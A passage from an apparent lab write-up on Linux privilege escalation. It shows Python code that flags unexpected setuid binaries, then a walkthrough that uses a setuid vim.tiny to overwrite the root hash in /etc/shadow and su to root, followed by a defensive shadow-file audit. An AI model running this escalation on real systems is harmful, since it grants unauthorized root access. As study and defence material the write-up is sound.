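    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
    "/bin/fusermount", "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/newuidmap", "/usr/bin/newgidmap", "/usr/bin/pkexec",
    "/usr/bin/at", "/usr/bin/traceroute6.iputils", "/usr/sbin/pppd",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/snapd/snap-confine", "/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
}

# An `ls -l` style line as LinEnum prints it; the path is the last field.
LS_LINE = re.compile(
    r"^(?P<mode>[-rwxsStT]{10})\s+\d+\s+(?P<owner>\S+)\s+\S+\s+\d+\s+.*?\s(?P<path>/\S+)$")

def parse_listing(text):
    """Yield (path, owner) for each setuid entry in a listing.

    Accepts bare paths (`find / -perm -u=s`) and ls -l lines (LinEnum).
    find's "Permission denied" / "No such file" noise is skipped, and an
    ls -l line only counts when the owner-execute bit is 's' (or 'S'),
    so LinEnum's SGID-only entries are ignored. Bare paths carry no owner.
    """
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("find:"):
            continue
        m = LS_LINE.match(line)
        if m:
            if m.group("mode")[3] in "sS":
                yield m.group("path"), m.group("owner")
        elif line.startswith("/"):
            yield line, None

def unexpected_suid(text, expected=EXPECTED_SUID):
    """Return the sorted setuid paths that are not in the baseline.

    Snap core images ship their own copies under /snap/core/<rev>/; those
    are compared by path relative to that root.
    """
    return sorted({path for path, _ in parse_listing(text)
                   if re.sub(r"^/snap/core/\d+", "", path) not in expected})

# Constructed sample: the find output from the lab above, abridged.
FIND_OUTPUT = """\
find: '/root': Permission denied
find: '/proc/82/fd/11': No such file or directory
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/vim.tiny
/usr/bin/sudo
find: '/var/cache/ldconfig': Permission denied
/bin/mount
/bin/umount
/bin/su
"""

if __name__ == "__main__":
    for path in unexpected_suid(FIND_OUTPUT):
        print("unexpected setuid binary:", path)   # /usr/bin/vim.tiny
```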
Now we should think about what we can do with a text editor that runs with root privileges.
Let's try opening a normally protected file, /etc/shadow, with vim.tiny. It works. So the next step is to edit the file with a root password hash of our own making:
student@attackdefense:~$ openssl passwd -1 -salt root password1
$1$root$bnjKntR6RB9fx4fklXJUc.
Finally, we use vim.tiny once more to edit /etc/shadow and write in our new root password hash:
root:$1$root$bnjKntR6RB9fx4fklXJUc.:17764:0:99999:7:::
daemon:*:17764:0:99999:7:::
bin:*:17764:0:99999:7:::
sys:*:17764:0:99999:7:::
sync:*:17764:0:99999:7:::
games:*:17764:0:99999:7:::
man:*:17764:0:99999:7:::
lp:*:17764:0:99999:7:::
mail:*:17764:0:99999:7:::
news:*:17764:0:99999:7:::
uucp:*:17764:0:99999:7:::
proxy:*:17764:0:99999:7:::
www-data:*:17764:0:99999:7:::
backup:*:17764:0:99999:7:::
list:*:17764:0:99999:7:::
irc:*:17764:0:99999:7:::
gnats:*:17764:0:99999:7:::
nobody:*:17764:0:99999:7:::
_apt:*:17764:0:99999:7:::
student:!:17797::::::
We save with :wq!, since vim complains "E45: 'readonly' option is set (add ! to override)".
Now we just need to su our way into a root shell:
student@attackdefense:~$ su
Password:
We enter password1 and that's it. We can confirm with whoami or id.
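The hash written into /etc/shadow above uses the legacy $1$ (MD5-crypt) scheme, which is one of the things a defender can check for. The audit below is an added example, not part of the lab; it parses the shadow format, flags empty and weak hash fields, and compares each hash against an assumed trusted snapshot so that a rewritten root entry like the one above is reported. The sample is the edited shadow file from above, abridged.

```python
# crypt(3) scheme prefixes; md5crypt ($1$, as used above) and the old
# 13-character DES scheme are not acceptable for a root password today.
SCHEMES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
           "$y$": "yescrypt", "$2b$": "bcrypt", "$2y$": "bcrypt"}
WEAK = {"md5crypt", "descrypt"}

def scheme_of(hashval):
    """Classify one shadow password field."""
    if hashval == "":
        return "empty"
    if hashval.startswith(("*", "!")):
        return "locked"
    for prefix, name in SCHEMES.items():
        if hashval.startswith(prefix):
            return name
    return "descrypt" if len(hashval) == 13 else "unknown"

def parse_shadow(text):
    """Return one dict per entry with its name, hash and last-change day."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError(f"malformed shadow line: {line!r}")
        entries.append({"name": fields[0], "hash": fields[1],
                        "lastchg": int(fields[2]) if fields[2] else None})
    return entries

def audit_shadow(text, baseline=None):
    """Return (account, finding) pairs.

    baseline maps an account name to the hash field recorded in a trusted
    snapshot (assumed to exist); any difference is reported, which is how a
    root entry rewritten as above gets caught even if the scheme were strong.
    """
    findings = []
    for e in parse_shadow(text):
        scheme = scheme_of(e["hash"])
        if scheme == "empty":
            findings.append((e["name"], "empty password field"))
        elif scheme in WEAK:
            findings.append((e["name"], f"weak hash scheme {scheme}"))
        if baseline and e["name"] in baseline and e["hash"] != baseline[e["name"]]:
            findings.append((e["name"], "hash differs from baseline"))
    return findings

# Constructed sample: the edited /etc/shadow from the lab above, abridged.
SHADOW_AFTER = """\
root:$1$root$bnjKntR6RB9fx4fklXJUc.:17764:0:99999:7:::
daemon:*:17764:0:99999:7:::
www-data:*:17764:0:99999:7:::
nobody:*:17764:0:99999:7:::
student:!:17797::::::
"""
# Assumed snapshot of the root field before the edit (a locked account).
BASELINE = {"root": "*"}

if __name__ == "__main__":
    for account, finding in audit_shadow(SHADOW_AFTER, BASELINE):
        print(f"{account}: {finding}")
```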